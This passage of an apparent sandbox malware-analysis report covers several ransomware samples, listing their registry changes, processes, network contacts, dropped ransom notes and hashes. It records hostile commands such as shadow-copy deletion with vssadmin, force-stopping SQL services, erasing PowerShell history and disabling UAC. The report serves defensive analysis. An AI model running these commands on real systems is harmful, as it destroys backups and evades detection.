| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 95.101.129.43:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 184.26.45.61:80 | x2.c.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabEC16.tmp
C:\Users\Admin\AppData\Local\Temp\TarECE3.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\451311-readme.html
C:\Users\Admin\Documents\RestorePop.xlsx
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1757s
Max time network
1160s
Command Line
Signatures
Avoslocker Ransomware
Renames multiple (66) files with added filename extension
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"
Network
Files
C:\Recovery\GET_YOUR_FILES_BACK.txt
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1792s
Max time network
1151s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (174) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1344 wrote to memory of 316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 1344 wrote to memory of 316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 316 wrote to memory of 4760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 316 wrote to memory of 4760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 1344 wrote to memory of 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 1344 wrote to memory of 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 3296 wrote to memory of 4340 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 3296 wrote to memory of 4340 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
Files
C:\Recovery\WindowsRE\How To Restore Your Files.txt
| MD5 | 81fc4c91a0938482f65a72216cda1e39 |
| SHA1 | 3fb3d27ceb1502ddf0d68fa9251a6aec46036377 |
| SHA256 | 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591 |
| SHA512 | ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1800s
Max time network
1161s
Command Line
Signatures
Loads dropped DLL
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Service *sql*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell rm (Get-PSReadlineOption).HistorySavePath
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 66.203.124.37:80 | mega.io | tcp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 15.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI42602\ucrtbase.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\python37.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI42602\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_tkinter.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\encoding\cp1252.enc
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_MD5.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA256.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA1.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Util\_strxor.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\certifi\cacert.pem
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_cpyHook.cp37-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\init.tcl
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tk86t.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl86t.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\pywintypes37.dll
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoyjlypg.4tt.ps1
C:\Recovery\decrypt_file.TxT
| MD5 | 2772699925346e374b9a2031385cf42f |
| SHA1 | dac85ee34a2b0e65623bbd572648ba73e5995fc6 |
| SHA256 | a5fa6416005be0c9de0e09faea13d40994292776c1036776282993dc6fb7bcf9 |
| SHA512 | 081121b2aaf12e0f10b23b3d1423bfdf7ff36bdea199630852723c1aa25468390e73232fa56dd05a3bf6ed166bf695b0ac2ce03e33d0d0a3fc1b24c2d6e9ddfd |
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:13
Platform
win7-20240704-en
Max time kernel
1798s
Max time network
1565s
Command Line
Signatures
Makop
Deletes shadow copies
Renames multiple (8801) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\settings.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\America\Argentina\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\THMBNAIL.PNG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTS.ICO | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.INF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\sonicsptransform.ax | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[76AC78C0].[[email protected]].makop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Sitka | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVHM.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
